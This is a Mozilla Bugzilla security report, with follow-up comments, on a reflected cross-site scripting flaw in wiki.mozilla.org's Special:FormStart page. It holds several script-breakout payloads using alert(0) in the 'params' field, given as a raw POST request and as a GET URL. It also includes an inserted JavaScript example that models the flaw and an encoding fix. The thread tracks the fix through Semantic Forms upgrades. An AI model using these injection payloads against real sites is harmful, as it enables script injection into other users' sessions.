Closed Bug 801638 Opened 8 years ago Closed 6 years ago

XSS: wiki.mozilla.org FormStart

Categories

(Websites :: wiki.mozilla.org, defect)

defect
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: curtisk, Unassigned)

References

()

Details

(Keywords: wsec-xss, Whiteboard: [site:wiki.mozilla.org] [dev=2015-02-05] [stage=2015-02-05] [prod=2015-02-05])

Hello,
My name is Siddhesh Gawde. I am a security researcher, and I have found one vulnerability on a sub-domain of Mozilla.
Details:

Type of issue: XSS
Browser: Mozilla Firefox v14.0.1
Operating System: Windows 7
Date of finding: 12/10/2012
Website Link: https://wiki.mozilla.org

Links:
The XSS vuln is of POST type here; we need to post data here:
https://wiki.mozilla.org/Special:FormStart

Post data is :
page_name=xsss&namespace=&super_page=&params=1087794</script><script>alert(0)</script><"&form=11

This will get the alert box to pop up instantly!

I have attached image of the vulnerability (As proof) of the link which I have mentioned above.
If you need any other information about it then please let me know.
Eagerly waiting for your reply.

Thank you,
Siddhesh Gawde.
Might this be a duplicate of the root issue that is behind bug 761114?
Whiteboard: [site:wiki.mozilla.org]
Flags: sec-bounty-
I can't seem to reproduce this, but I might not be doing it right.

Is this still reproducible?
Flags: needinfo?(curtisk)
Flags: needinfo?(coolsiddheshgawade)
I can't seem to repro either, this may have been addressed by the most recent wiki updates.
Flags: needinfo?(curtisk)
Not able to reproduce this one, the layout is changed completely.
Flags: needinfo?(coolsiddheshgawade)
Sorry, I made a mistake while checking it actually.
I am still able to reproduce it.
poc: http://gyazo.com/adc71a0b73d750d96bf7e4ca4573b2ad

Request :

LINK:
https://wiki.mozilla.org/Special:FormStart

HEADERS:
Host: wiki.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wiki.mozilla.org/Special:FormStart
Cookie: __utma=132703880.484202267.1413400289.1413400289.1413468159.2; __utmz=132703880.1413468159.2.2.utmcsr=bugzilla.mozilla.org|utmccn=(referral)|utmcmd=referral|utmcct=/show_bug.cgi; optimizelySegments=%7B%222000810488%22%3A%22false%22%2C%222017550344%22%3A%22ff%22%2C%221994990450%22%3A%22none%22%2C%222011280991%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1413467954737r0.04618477120119591; optimizelyBuckets=%7B%7D; __utmb=132703880.1.10.1413468159; __utmc=132703880; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50


POST DATA:
page_name=x&form=11&namespace=&super_page=&params='"></script><script>alert(0)</script><"


I am using Mozilla v29.
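The two proofs of concept above both send a `params` value containing `</script><script>alert(0)</script>`, which only works if the server writes that value into an inline script block without encoding it. The following is an added example, not code from Semantic Forms, MediaWiki or wiki.mozilla.org: it models that bug class with an assumed template (`var sfParams = '...'`), shows the encoding that closes the hole, and gives a check a tester can run against any renderer. Only the payload is taken from the report; everything else is an assumption for illustration.

```javascript
// Added example, not Semantic Forms or wiki.mozilla.org code. The template
// below is an assumption about the bug class; only PAYLOAD comes from the bug.

// Payload copied from the POST body in the report (constructed test input).
const PAYLOAD = `'"></script><script>alert(0)</script><"`;

// Assumed vulnerable pattern: the request value is dropped into a JS string
// literal with no encoding, so "</script>" in the data ends the script
// element and whatever follows is parsed as fresh HTML.
function renderVulnerable(params) {
  return `<script>var sfParams = '${params}';</script>`;
}

// Hardened version: serialise as a JS string literal, then escape the two
// byte sequences the HTML parser cares about inside script data: "</" (ends
// the element) and "<!--" (enters the escaped state). JSON.stringify leaves
// both untouched, which is why the extra replaces are needed. U+2028/U+2029
// are escaped because older engines treated them as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')
    .replace(/<!--/g, '<\\!--')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(params) {
  return `<script>var sfParams = ${jsStringLiteral(params)};</script>`;
}

// Regression check: take the text between the first "<script>" and the last
// "</script>" and see whether the data closed the element early. A literal
// "<script" inside a string is harmless on its own; "</script" or "<!--" in
// the script body is what breaks out.
function dataClosesScript(html) {
  const start = html.indexOf('<script>') + '<script>'.length;
  const end = html.lastIndexOf('</script>');
  const body = html.slice(start, end);
  return /<\/script|<!--/i.test(body);
}

// The hardened output must still evaluate to the original value, or the fix
// trades an XSS for silently corrupted form parameters.
function roundTrips(value) {
  const lit = jsStringLiteral(value);
  return new Function(`return ${lit};`)() === value;
}

console.log('vulnerable breaks out:', dataClosesScript(renderVulnerable(PAYLOAD)));
console.log('hardened breaks out:  ', dataClosesScript(renderHardened(PAYLOAD)));
console.log('round trip ok:        ', roundTrips(PAYLOAD));
```

The check deliberately does not count `<script` tags: inside script data the parser does not start a new element on `<script`, so that count would flag the hardened output too. What matters is whether the attacker-controlled bytes can end the current element, which is exactly what the reporter's payload does.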
Ah, I can indeed reproduce that way. Thanks, Siddhesh.
I just confirmed this, this is the first time I had seen it.

https://bugzilla.wikimedia.org/show_bug.cgi?id=72436 (I can add anyone from Mozilla who wants access, just need to know your user on our instance).

We'll get a patch out asap to fix the problem, and coordinate getting an official patch from the maintainers of that extension into the main repo, probably by next week.
(In reply to csteipp from comment #10)
> I just confirmed this, this is the first time I had seen it.
> 
> https://bugzilla.wikimedia.org/show_bug.cgi?id=72436 (I can add anyone from
> Mozilla who wants access, just need to know your user on our instance).

I'm the same on there as here; please add me.

> We'll get a patch out asap to fix the problem, and coordinate getting an
> official patch from the maintainers of that extension into the main repo,
> probably by next week.

We push to our environments every Thursday, FWIW.
Gordon, I just added you to our bug.

The extension maintainer made a public patch for it (https://gerrit.wikimedia.org/r/#/c/168618/). 

I don't have an SMW dev instance, but that should solve the issue.
Whiteboard: [site:wiki.mozilla.org] → [site:wiki.mozilla.org] [dev=2014-10-30]
Depends on: 1081712
With the upgrade of the semantic extensions (bug 1081712), this should be fixed.
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
This is still broken:

https://wiki.mozilla.org/Special:FormStart?page_name=x&form=11&namespace=&super_page=&params='"></script><script>alert('this is still broken')</script><"
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Depends on: 1128117
OK, SemanticForms has been upgraded to 3.1, and it looks like this is now fixed for real.
Group: websites-security
Status: REOPENED → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Whiteboard: [site:wiki.mozilla.org] [dev=2014-10-30] → [site:wiki.mozilla.org] [dev=2015-02-05] [stage=2015-02-05] [prod=2015-02-05]